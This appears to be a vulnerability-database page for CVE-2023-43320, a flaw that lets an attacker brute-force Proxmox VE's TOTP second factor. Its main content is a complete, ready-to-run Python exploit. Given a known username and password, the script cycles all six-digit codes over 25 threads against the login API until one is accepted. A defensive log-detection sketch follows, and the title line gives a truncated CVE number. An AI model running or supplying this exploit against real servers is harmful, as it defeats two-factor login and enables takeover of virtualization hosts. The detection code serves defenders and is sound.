Proxmox VE 7.4-1 TOTP Brute Force

Published: 02 Feb 2024 00:00:00
Reported by: Gabe Rust, Cory Cline
Type: packetstorm
Source: packetstormsecurity.com

Proxmox VE 7.4-1 TOTP Brute Force CVE-2023-4332

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | Proxmox VE - TOTP Brute Force Exploit | 31 Jan 2024 00:00 | zdt |
| ATTACKERKB | CVE-2023-43320 | 27 Sep 2023 23:15 | attackerkb |
| CNNVD | Proxmox Virtual Environment Security Vulnerability | 27 Sep 2023 00:00 | cnnvd |
| CVE | CVE-2023-43320 | 27 Sep 2023 00:00 | cve |
| Cvelist | CVE-2023-43320 | 27 Sep 2023 00:00 | cvelist |
| Exploit DB | Proxmox VE - TOTP Brute Force | 31 Jan 2024 00:00 | exploitdb |
| NVD | CVE-2023-43320 | 27 Sep 2023 23:15 | nvd |
| Prion | Authentication flaw | 27 Sep 2023 23:15 | prion |
| Positive Technologies | PT-2023-28777 · Proxmox · Proxmox Ve +2 | 27 Sep 2023 00:00 | ptsecurity |
| RedhatCVE | CVE-2023-43320 | 9 Jan 2026 12:40 | redhatcve |
```python
# Exploit Title: Proxmox VE TOTP Brute Force
# Date: 09/23/2023
# Exploit Author: Cory Cline, Gabe Rust
# Vendor Homepage: https://www.proxmox.com/en/
# Software Link: http://download.proxmox.com/iso/
# Version: 5.4 - 7.4-1
# Tested on: Debian
# CVE : CVE-2023-43320

import concurrent.futures
import time
import requests
import urllib.parse
import json
import os
import urllib3

urllib3.disable_warnings()
threads=25

#################### REPLACE THESE VALUES #########################
password="KNOWN PASSWORD HERE"
username="KNOWN USERNAME HERE"
target_url="https://HOST:PORT"
##################################################################

ticket=""
ticket_username=""
CSRFPreventionToken=""
ticket_data={}

auto_refresh_time = 20 # in minutes - 30 minutes before expiration
last_refresh_time = 0

# Every possible 6-digit TOTP value, zero-padded
tokens = []

for num in range(0,1000000):
    tokens.append(str(num).zfill(6))

# First factor: log in with the known password to obtain a TFA challenge
# ticket and a CSRF prevention token.
def refresh_ticket(target_url, username, password):
    global CSRFPreventionToken
    global ticket_username
    global ticket_data
    refresh_ticket_url = target_url + "/api2/extjs/access/ticket"
    refresh_ticket_cookies = {}
    refresh_ticket_headers = {}
    refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"}
    ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text)
    ticket_data = json.loads(ticket_data_raw)
    CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"]
    ticket_username = ticket_data["data"]["username"]

# Second factor: submit one TOTP candidate against the pending challenge.
def attack(token):
    global last_refresh_time
    global auto_refresh_time
    global target_url
    global username
    global password
    global ticket_username
    global ticket_data
    # Renew the challenge ticket before it expires
    if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ):
        refresh_ticket(target_url, username, password)
        last_refresh_time = int(time.time())

    url = target_url + "/api2/extjs/access/ticket"
    cookies = {}
    headers = {"Csrfpreventiontoken": CSRFPreventionToken}
    stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1]
    stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A')
    data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)}
    response = requests.post(url, headers=headers, cookies=cookies, data=data, verify=False)
    # A response body longer than 350 characters is treated as a successful login
    if(len(response.text) > 350):
        print(response.text)
        os._exit(1)

# Walk the whole code space repeatedly until a candidate is accepted
while(1):
    refresh_ticket(target_url, username, password)
    last_refresh_time = int(time.time())

    with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
        res = [executor.submit(attack, token) for token in tokens]
        concurrent.futures.wait(res)
```
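A detection sketch for the traffic the script above generates: many POSTs to `/api2/extjs/access/ticket` from one client in a short time, optionally ending in a long reply. This is an added example, not part of the original advisory or of Proxmox code; the access-log layout, timestamp format, window and threshold are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Assumed combined-log-style layout; adapt the regex and TS_FORMAT to the real log.
LINE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"POST /api2/extjs/access/ticket HTTP/[\d.]+" \d{3} (?P<size>\d+)$')
TS_FORMAT = "%d/%m/%Y:%H:%M:%S %z"
WINDOW = timedelta(seconds=60)  # hypothetical tuning values
THRESHOLD = 10                  # ticket POSTs tolerated per source per window
SUCCESS_SIZE = 350              # the script above treats longer replies as success

def find_ticket_floods(lines, window=WINDOW, threshold=THRESHOLD):
    """Map each flooding source to its first alert time and whether a long
    (possibly successful) reply was logged while the flood was in progress."""
    recent, alerts = defaultdict(deque), {}
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # other endpoints and methods are out of scope
        src, ts = m["src"], datetime.strptime(m["ts"], TS_FORMAT)
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:  # drop requests that left the sliding window
            q.popleft()
        if len(q) > threshold:
            alert = alerts.setdefault(src, {"first_alert": ts, "long_reply": False})
            if int(m["size"]) > SUCCESS_SIZE:
                alert["long_reply"] = True
    return alerts

def build_sample():
    """Constructed log lines: one flooding client, one ordinary two-step login."""
    base = datetime(2024, 2, 2, 10, 0, 0, tzinfo=timezone.utc)
    def row(src, sec, size, req="POST /api2/extjs/access/ticket"):
        ts = (base + timedelta(seconds=sec)).strftime(TS_FORMAT)
        return f'{src} - - [{ts}] "{req} HTTP/1.1" 200 {size}'
    flood = [row("203.0.113.7", i // 5, 900 if i == 39 else 120) for i in range(40)]
    normal = [row("198.51.100.4", 3, 400), row("198.51.100.4", 9, 800),
              row("198.51.100.4", 10, 300, req="GET /api2/json/version")]
    return flood + normal

if __name__ == "__main__":
    for src, info in find_ticket_floods(build_sample()).items():
        print(src, info["first_alert"].isoformat(), "long reply seen:", info["long_reply"])
```

A source flagged with `long_reply` set deserves priority review, since the second factor for that account may have been guessed.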


Vulners AI Score: 7.4 (High risk)
CVSS 3.1: 8.8
EPSS: 0.03153